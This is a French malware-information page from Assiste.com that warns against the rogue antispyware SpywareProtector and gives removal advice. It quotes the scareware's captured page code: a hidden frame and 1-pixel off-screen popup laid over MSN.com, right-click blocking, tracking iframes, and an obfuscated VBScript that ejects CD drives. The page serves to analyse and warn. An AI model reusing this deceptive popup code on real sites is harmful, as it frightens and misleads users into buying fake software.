Discussion Discussion
Faire un lien Lien
Assiste.com - Sécurité informatique - Décontamination - Antivirus - Protection - Protection de la Vie Privée Assiste.com - Sécurité informatique - Décontamination - Antivirus - Protection - Protection de la Vie Privée

SpywareProtector

Dernière mise à jour
12.11.2015 - 00h00 - Paris - (Assiste - Pierre Pinard) - Mises à jour.

SpywareProtector - Pourquoi ne pas l'utiliser et comment le désinstaller.

SpywareProtector
SpywareProtector
SpywareProtector    SpywareProtector    SpywareProtector    SpywareProtector
 

SpywareProtectorSpywareProtectorSpywareProtector


SpywareProtector
Attention - Warning

SpywareProtector - Attention - SpywareProtector     SpywareProtector - Warning - SpywareProtector
Français - SpywareProtectorCe logiciel appartient à une classe de logiciels à éviter, voire dangereux, faux, menteurs, crapuleux, d'attaque, telle que :
« Scareware »
« Crapware »
« Rogue »

Ne pas télécharger - Ne pas utiliser - Ne pas acheter - Ne pas tester.

English - SpywareProtectorThis software belongs to a class of softwares to avoid, even dangerous, false, liars, villainous, of attack, such as:
"Scareware"
"Crapware"
"Rogue"

Do not download - Do not use - Do not buy - Do not try.


 
SpywareProtector
E : ancienne fiche 2001/2009 – M : ancienne fiche 2001/2009
Classe
  Anti-spywares / Anti-adwares (Classe des anti-malwares)
Éditeur et Groupe
 

Éditeur : Web3000, n-Case, 180Solutions

Groupe : RedV NetWork

Description
Commentaires
 

Nous n'avons pas trouvé de lien direct entre cet outil crapuleux et la société RedV si ce n'est que celle-ci édite et distribue toute une série de logiciels crapuleux dont les noms sont dans une série xxx-Protector (PopUpProtector, HistoryProtector, X-Protector, AdProtector, PanicProtector, ProtectorSuite). On trouve 3 produits proposés simultanément à Spyware Protector, qui n'entrent pas dans cette convention de nommage : Website PopKiller, Anti-virus Protection et Memory Maximizer (ces produits sont introduits dans l'anti-logithèque).

Utilise la technique du téléchargement silencieux conduit par une popup invisible (Web Bug) sur des sites affiliés et piégés, puis affiche aussitôt, quasiment en plein écran, une popup effrayante. Cette image est l'archétype des popup tentant de vous faire peur. Le Web Bug invisible est lui-même encapsulé dans un frame invisible exécutant quelques scripts additionnels, le frame visible ouvrant en pleine fenêtre sur le véritable site de microsoft, MSN.com.

L'un de ces sites piégés est http://www.browser-page.com/my_home.html (le premier frame, invisible, va chercher http://www.browser-page.com/2top.html). C'est, lors d'un test du 07.08.04, le même site piégé (avec le même piège) que celui qui faisait la promotion de AdwareHunter il y a quelques mois.

<frameset framespacing="0" border="0" frameborder="0" rows="21,1%">
<frame name="top" src="2top.html" marginwidth="0" marginheight="0" scrolling="no" target="_self" noresize>
<frame name="bottom" src="http://www.msn.com" marginwidth="0" marginheight="0" scrolling="auto" noresize>
<noframes>
<body>
</body>
</noframes>
</frameset>

Le frame caché exécute ce script dont la fonction est d'aller chercher une page html (qui est la popup ci-dessous) à http://www.spywareprotector.com/Computer_Error.htm et de l'afficher par dessus la page du site MSN, 1 seconde après. Un son est joué et, simultanément, tous vos lecteurs de cd-rom s'ouvrent.

<script LANGUAGE="JavaScript">
<!-- Begin
closetime = 20; // Close window after __ number of seconds?
// 0 = do not close, anything else = number of seconds
function Start(URL, WIDTH, HEIGHT) {
windowprops = "left=5000,top=5000,width=" + WIDTH + ",height=" + HEIGHT; // Position de la fenêtre cachée
// Elle est affichée à partir du pixel 5000 en hauteur et du pixel 5000 en largeur
// Les résolutions d'écrans étant de 800*600 ou 1024*768, au maximum, 1600*1200, cette fenêtre ne sera jamais visible

preview = window.open(URL, "preview", windowprops);
if (closetime) setTimeout("preview.close();", closetime*1000);
}
function doPopup() {
url = "http://www.spywareprotector.com/Computer_Error.htm";
width = 1; // Largeur de la popup, en pixel : 1 pixel, donc invisible
height = 1; // Hauteur de la popup, en pixel : 1 pixel, donc invisible
delay = 0; // Délais en seconde avant l'ouverture de la popup
timer = setTimeout("Start(url, width, height)", delay*1000); // Attente d'1 seconde (1.000 millièmes de sec.) afin de déjouer certains anti-popup primaires
}
// End -->
</script>
</head>
<body OnLoad="doPopup();" topmargin="0" leftmargin="0" bgcolor="#004E82">
<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

<p align="center">
<a target="_blank" href="http://www.restorationhair.com/v4_step1.php?TID=bhome_701">
<img border="0" src="../google_ad1.gif" width="340" height="21"></a></p>
<!-- PayPopup.com Advertising Code Begin -->
<script LANGUAGE="JavaScript1.1" SRC="http://www.PayPopup.com/popup.php? id=EWNprasad&pop=enter&t=10&subid=18918&blk=1">
</SCRIPT>
<!-- PayPopup.com Advertising Code End -->
<script Language="JavaScript"> var D = new Date(); var TheDate =D.getTime();document.write('<iframe id="frame1" width=0 height=0 frameborder="no" scrolling="no" src="http://jsurfed.cjt1.net/HTM/446/0/JavaSiteRequest.asp? AW=446&LV=6000&DC=0&L=0& NF=0&IW=0&IH=0&ORD='+TheDate+'?" border="no"></iframe>')</script>
<!-- RON -CH RON, Tracking Pixel (Body) -->
<script language="javascript" src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=1;ac=5;c=731;"> </script><noscript>
<a href="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=2;dt=3;ac=5;c=731; " target="_blank"> <img width=1
height=1 src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=3;ac=5;c=731;" border=0></a></noscript>
<!-- RON -CH RON, Tracking Pixel (Body) -->
</body>

La popup de fausse alerte, bien effrayante, suivie d'une seconde puis d'une pleine page (non représentée) tente une vente forcée. Le visiteur est induit en erreur car ceci s'affiche au dessus du site réel MSN de Microsoft et le visiteur incrédule est amené à penser que l'alerte provient de Microsoft lui-même. Nota : sur la page de vente de ce truc, l'incitation est augmentée par la proposition de trois outils additionneles, livrés en bundle avec. Ces 3 outils sont donc immédiatement suspects et introduits dans la liste des faux utilitaires "interdits" : Website PopKiller, Anti-virus Protection et Memory Maximizer.




En bas de page on trouve ce script crypté:

<script type="text/javascript">
document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u004c \u0041\u004e\u0047
\u0055\u0041\u0047\u0045\u003d\u0022\u0056\u0042\u0053\u0063\u0072 \u0069\u0070\u0074
\u0022\u003e\u000d\u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053 \u0065\u0074\u0020
\u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061 \u0074\u0065\u004f
\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\u004d\u0050\u006c \u0061\u0079\u0065
\u0072\u002e\u004f\u0043\u0058\u002e\u0037\u0022\u0020\u0029\u000d \u000a\u0053\u0065
\u0074\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u0020\u003d\u0020
\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\u0043 \u006f\u006c\u006c
\u0065\u0063\u0074\u0069\u006f\u006e\u000d\u000a\u0069\u0066\u0020 \u0063\u006f\u006c
\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e \u0074\u0020\u003e
\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\u000a\u0046 \u006f\u0072\u0020
\u0069\u0020\u003d\u0020\u0030\u0020\u0074\u006f\u0020\u0063\u006f \u006c\u0043\u0044
\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020 \u002d\u0020\u0031
\u000d\u000a\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u002e\u0049\u0074
\u0065\u006d\u0028\u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074 \u000d\u000a\u004e
\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\u006f\u006d \u000d\u000a\u0045
\u006e\u0064\u0020\u0049\u0066\u000d\u000a\u002d\u002d\u003e\u000d \u000a\u003c\u002f
\u0073\u0063\u0072\u0069\u0070\u0074\u003e')

Ce qui donne, après décryptage :

<script type="text/javascript">document.write('<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>')


Il s'agit donc d'une opération d'éjection sur tous les cd-rom de la machine (on provoque leur ouverture).

Si on ne réagit pas assez vite à la première popup, une seconde, encore plus alarmante, apparait. Attention ! Le bouton de fermeture ne fonctionne pas (c'est une fausse fenêtre ! C'est entièrement une image cliquable ! Il s'agit juste d'un dessin d'une fenêtre Windows avec un texte plaqué dessus. Vous ne pouvez pas échapper à la réponse implicite "Ok" sauf à tuer votre navigateur Internet).



Lorsque vous voyez des choses comme cela, ne vous affolez pas : c'est complètement faux.


Utilise plusieurs noms
SpywareProtector Web3000, n-Case, 180Solutions

SpywareProtector est connu sous divers noms :

S'inscrit dans une série dite xxxProtector :

  • Ad Protector
  • Adprotector
  • History Protector
  • Historyprotector
  • Panic Protector
  • Panicprotector
  • Popup Protector
  • Popupprotector
  • Protector Suite
  • ProtectorSuite
  • Surf Protector
  • SurfProtector
  • X Protector
  • XProtector
  • Antivirus Protection
  • Anti-virus Protection
  • Memory Maximizer
  • Spyware Protector
  • SpywareProtector
  • Website Popupkiller

Principe d'un même logiciel (clône) connu sous plusieurs noms

Lorsqu'un produit logiciel tente d'occuper le Web sous plusieurs noms (laissant croire à l'existence de plusieurs logiciels concurrents, parfois aux apparences légèrement différentes), au lieu de capitaliser sur un seul nom, c'est que ce logiciel n'a aucune qualité ni aucune notoriété. En étant présent sur le Web sous plusieurs noms, il s'agit d' « occuper le terrain » - de « ratisser large », une forme de SEO - Search Engine Optimisation - Optimisation pour moteurs de recherche agressive, apparentée au cybersquatting, dupant les moteurs de recherche et ceux qui les utilisent. Le but est de capturer et piéger le maximum d'internautes. Ce logiciel est donc, de part ses méthodes de diffusion, de mauvaise qualité et trompeur. Les développeurs de logiciels malveillants et les escros utilisent souvent cette méthode. Chaque fois qu'un logiciel est identifié comme étant le clone d'un autre, tous sont immédiatement considérés comme des tentatives de duperies. Le logiciel, son éditeur et son auteur sont immédiatement suspects. SpywareProtector est, à ce titre, un crapwares. SpywareProtector est inséré dans la crapthèque sous chacun de ses noms.

Version d'essai
Trial
 

Non ! Acte d'achat uniquement ! N'offre aucune possibilité d'évaluation du produit.

Comment SpywareProtector arrive dans un ordinateur

Méthodes de déploiement génériques

Illustrations
Comment supprimer SpywareProtector
 



Procédure de décontamination

anti-malwares, anti-crapwares, anti-adwares

Comment supprimer SpywareProtector

Pour supprimer SpywareProtector, utilisez et suivez point par point la Procédure gratuite de décontamination anti-malwares, anti-adwares et anti-crapwares. Il s'agit d'une procédure générale de décontamination qui ne vise pas uniquement l'éradication de SpywareProtector mais de toutes les contaminations des types suivants qui pourraient se trouver présentes dans votre ordinateur :

  • Anti-malwares (malwares signifie " logiciels malveillants " et, plus généralement, " malveillances " - Plus d'informations sur la notion de malwares en lisant l'article Malwares)
  • Anti-adwares (adwares signifie " logiciels délivrant des publicités " (et pratiquant un espionnage intensif et temps réel de tous vos moindres faits et gestes, pudiquement appelée tracking) - Plus d'informations sur la notion d'adwares en lisant l'article Adwares)
  • Anti-crapwares (crapwares signifie " logiciels crapuleux " - Plus d'informations sur la notion de crapwares en lisant l'article Crapwares)
  • Anti-scarewares
  • Anti-rogues
  • Anti-fakes
  • Anti-PUP
  • Anti-Barres d'outils
  • Anti-Keylogger
  • Anti-Hijacker

Cette Procédure de décontamination utilise, dans un ordre spécifique, des outils entièrement gratuits et de grande notoriété dont, par exemple :

Une fois SpywareProtector supprimé

Une fois SpywareProtector supprimé, il convient de réfléchir et analyser ce qui a pu se passer en amont et risque de se passer en aval de l'attaque, afin d'y apporter des correctifs préventifs.

  • En amont, réfléchir à ce qui a permis que l'attaque intervienne. La décontamination qui a permis d'éradiquer SpywareProtector n'est pas un geste suffisant. Il faut trouver et comprendre pourquoi et comment, en amont, le parasite a pu pénétrer l'ordinateur et s'installer, puis corriger cette faille, qu'elle soit celle d'une attitude personnelle inconséquente ou celle d'une faille de sécurité d'un composant logiciel de l'ordinateur, sinon cela recommencera encore et encore.
  • En aval, réfléchir et d'imaginer ce qui risque de se passer. Il faut s'interroger sur les risques consécutifs à ce qu'a fait le parasite (mots de passe à changer, comptes bancaires à surveiller, etc. ...).

C'est le moment de lire et intégrer les recommandations de l'article : Attitude saine post contamination - Safe attitude.

Machines et adresses IPs
 

Les machines suivantes peuvent être bloquées, par exemple en utilisant votre pare-feu.

87.117.252.11
Analyse du code
  Analyse pas encore effectuée (ou absence du code dans ma collection - pourriez-vous m'indiquer un lien de téléchargement de ce code)

Pour en savoir plus

Url du téléchargement
 
Domaine Whois et IP Whois


Tentatives de Whois sur des domaines possibles constitués du nom du logiciel suivi des TDL .com, .net et .org
Whois spywareprotector.com
Whois spywareprotector.net
Whois spywareprotector.org
Ils en parlent
 
Programme d'affiliation
  Verio Productions Limited, Avenue House, St Julian'S Avenue, St Peter Port, Guernsey Gy1 1Wa
Registrant
 
Registrar
 

 

How to get rid of SpywareProtectorRecherches avancées à propos de SpywareProtectorSpywareProtector uninstall guide

Googler dans un site
SiteGoogler sur le nomGoogler sur la famille
(Matrice)
Googler sur l'Editeur
Assiste SpywareProtector Web3000, n-Case, 180Solutions
VirusTotal SpywareProtector Web3000, n-Case, 180Solutions
HerdProtect SpywareProtector Web3000, n-Case, 180Solutions
Metascan SpywareProtector Web3000, n-Case, 180Solutions
Reason Core SpywareProtector Web3000, n-Case, 180Solutions
Symantec SpywareProtector Web3000, n-Case, 180Solutions
Kaspersky SpywareProtector Web3000, n-Case, 180Solutions
Kaspersky SecureList SpywareProtector Web3000, n-Case, 180Solutions
BleepingComputer SpywareProtector Web3000, n-Case, 180Solutions
SpywareInfo forum SpywareProtector Web3000, n-Case, 180Solutions
Malwarebytes SpywareProtector Web3000, n-Case, 180Solutions
EmsiSoft SpywareProtector Web3000, n-Case, 180Solutions
EmsiSoft IsThisFileSafe SpywareProtector Web3000, n-Case, 180Solutions
SpyBot SpywareProtector Web3000, n-Case, 180Solutions
ZHPDiag SpywareProtector Web3000, n-Case, 180Solutions
FreeFixer SpywareProtector Web3000, n-Case, 180Solutions
Spyware Warrior forum SpywareProtector Web3000, n-Case, 180Solutions
Wilders Security forum SpywareProtector Web3000, n-Case, 180Solutions
Microsoft Communauté SpywareProtector Web3000, n-Case, 180Solutions
Libellule Forum SpywareProtector Web3000, n-Case, 180Solutions
Malekal Forum SpywareProtector Web3000, n-Case, 180Solutions
PCAstuces Forum SpywareProtector Web3000, n-Case, 180Solutions
Zebulon Forum SpywareProtector Web3000, n-Case, 180Solutions
Security-x Forum SpywareProtector Web3000, n-Case, 180Solutions
AidoWeb Forum SpywareProtector Web3000, n-Case, 180Solutions
WayBack Machine SpywareProtector Web3000, n-Case, 180Solutions
Recherches en vrac
Nom du produit Matrice Editeur Groupe Domaine supposé en .com Une page supposée en .html
Google SpywareProtector Web3000, n-Case, 180Solutions RedV NetWork SpywareProtector.com spywareprotector.html
Domaine Sous-domaine www IP
WayBack Machine www.
Google Safe Browsing www. 87.117.252.11
Norton Safe Web - NSW www. 87.117.252.11
AVG Threat Labs www. 87.117.252.11
WOT - Web Of Trust www. 87.117.252.11
VirusTotal www. 87.117.252.11
URLVoid www. 87.117.252.11
McAfee SiteAdvisor www.
Domaine Whois IP Whois Reverse IP
Webhosting



87.117.252.11



DomainTools



87.117.252.11



GoDaddy



87.117.252.11



website.informer



87.117.252.11



PagesInventory



87.117.252.11



#SpywareProtector, #spywareprotector, #Web3000, n-Case, 180Solutions, #RedV NetWork

 Comment supprimer SpywareProtector

Contact à propos de cette fiche

Français - SpywareProtector Contact informatif à propos de cette fiche :
Afin de fournir une information correcte, précise et à jour, j'encourage l'éditeur de ce produit ou service à me contacter si la moindre partie de cette fiche est à réviser.

Français - SpywareProtector Informative contact about this card:
In order to provide correct, accurate and up to date information, I encourage the editor of this product or service to contact me if any part of this card is to be revised.

 

Comment supprimer SpywareProtectorSécurité informatique - Comment je me fais avoirComment supprimer SpywareProtector

Comment supprimer SpywareProtectorContre-mesuresComment supprimer SpywareProtector

Comment supprimer SpywareProtectorDerrière le rideauComment supprimer SpywareProtector

Comment supprimer SpywareProtectorRéférencesComment supprimer SpywareProtector

Comment supprimer SpywareProtectorRessourcesComment supprimer SpywareProtector

FAQ Comment supprimer SpywareProtectorFAQFAQ Comment supprimer SpywareProtector

Avis sur SpywareProtector
SpywareProtector sain ou dangereux
Comment désinstaller SpywareProtector
Comment supprimer SpywareProtector
Supprimer le malware SpywareProtector
Supprimer le virus SpywareProtector
Comment effacer SpywareProtector
Virus SpywareProtector
SpywareProtector : Guide de désinstallation
SpywareProtector : Removal Guide
SpywareProtector qu'est-ce que c'est
How to uninstall SpywareProtector
Eradiquer Virus SpywareProtector
Delete SpywareProtector
How to remove SpywareProtector
Remove SpywareProtector from my PC
Remove SpywareProtector malware
Step by step removal guide for SpywareProtector
Uninstall SpywareProtector
Uninstall SpywareProtector Malware
SpywareProtector fake alert
SpywareProtector keys
SpywareProtector license key
SpywareProtector Removal
SpywareProtector Virus
Get rid of SpywareProtector
#SpywareProtector, #spywareprotector, #Web3000, n-Case, 180Solutions, #RedV NetWork